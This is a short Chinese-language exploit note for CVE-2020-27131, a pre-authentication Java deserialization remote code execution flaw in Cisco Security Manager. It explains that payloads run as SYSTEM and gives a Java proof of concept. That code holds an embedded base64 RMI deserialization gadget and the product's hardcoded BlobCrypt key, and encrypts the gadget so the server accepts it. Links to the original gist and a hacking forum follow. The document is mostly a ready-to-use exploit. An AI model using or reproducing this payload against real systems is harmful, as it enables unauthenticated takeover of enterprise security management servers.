# CVE-2020-27131 Cisco Security Manager 反序列化RCE

思科安全管理器是一个企业级安全管理应用程序，可提供对思科安全和网络设备的了解和控制。Cisco Security Manager在广泛的Cisco安全设备中提供全面的安全管理（配置和事件管理），包括Cisco ASA自适应安全设备，Cisco IPS系列传感器设备，Cisco集成服务路由器（ISR），Cisco防火墙服务模块（FWSM） ，Cisco Catalyst，Cisco交换机等等。Cisco Security Manager允许您有效地管理各种规模的网络-从小型网络到包含数百台设备的大型网络。

多个预身份验证漏洞已于2020-07-13提交给思科，并且（根据思科）已于2020-11-10在4.22版中进行了修补。发行说明未提及有关漏洞的任何信息，也未发布安全公告。所有有效负载均在NT AUTHORITY \ SYSTEM上下文中进行处理。

PoC：


```
import java.security.InvalidKeyException;
import java.util.Base64;
import com.cisco.nm.cmf.security.jaas.BlobCrypt;

public class JaasEncryptor {

        public static void main(String args[]) {
                String b64Payload = "rO0ABXN9AAAAAQAaamF2YS5ybWkucmVnaXN0cnkuUmVnaXN0cnl4cgAXamF2YS5sYW5nLnJlZmxlY3QuUHJveHnhJ9ogzBBDywIAAUwAAWh0ACVMamF2YS9sYW5nL3JlZmxlY3QvSW52b2NhdGlvbkhhbmRsZXI7eHBzcgAtamF2YS5ybWkuc2VydmVyLlJlbW90ZU9iamVjdEludm9jYXRpb25IYW5kbGVyAAAAAAAAAAICAAB4cgAcamF2YS5ybWkuc2VydmVyLlJlbW90ZU9iamVjdNNhtJEMYTMeAwAAeHB3MQAKVW5pY2FzdFJlZgAIMTAuMC4wLjIAAAG7AAAAAEBnvkQAAAAAAAAAAAAAAAAAAAB4";

                byte[] payload = Base64.getDecoder().decode(b64Payload);
                byte[] key = new byte[]{-100, 76, -23, 87, 125, 0, 5, 94, 12, 76, 37, -84, 36, 78, 123, 5};
                
                byte[] enc = BlobCrypt.encryptArray(payload, key);
                System.out.println("Encrypted payload: " + Base64.getEncoder().encodeToString(enc));
                byte[] dec = BlobCrypt.decryptArray(enc, key);
        }
}
```

ref：

https://gist.github.com/Frycos/8bf5c125d720b3504b4f28a1126e509e#file-csm_pocs-md

https://forum.ywhack.com/thread-114711-1-4.html